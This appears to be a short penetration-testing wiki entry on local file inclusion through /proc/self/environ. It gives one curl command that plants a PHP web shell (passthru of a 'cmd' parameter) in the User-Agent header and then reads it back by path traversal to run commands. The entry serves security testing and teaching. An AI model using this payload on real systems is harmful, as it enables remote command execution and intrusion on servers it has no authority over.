/proc

chevron-right/proc/self/environhashtag

Testers can abuse a process created due to a request. The payload is injected in the User-Agent header.

# Sending a request to $URL with a malicious user-agent
# Accessing the payload via LFI
curl --user-agent "<?php passthru($_GET['cmd']); ?>" $URL/?parameter=../../../proc/self/environ
chevron-right🛠️ /proc/*/fdhashtag

Last updated

Was this helpful?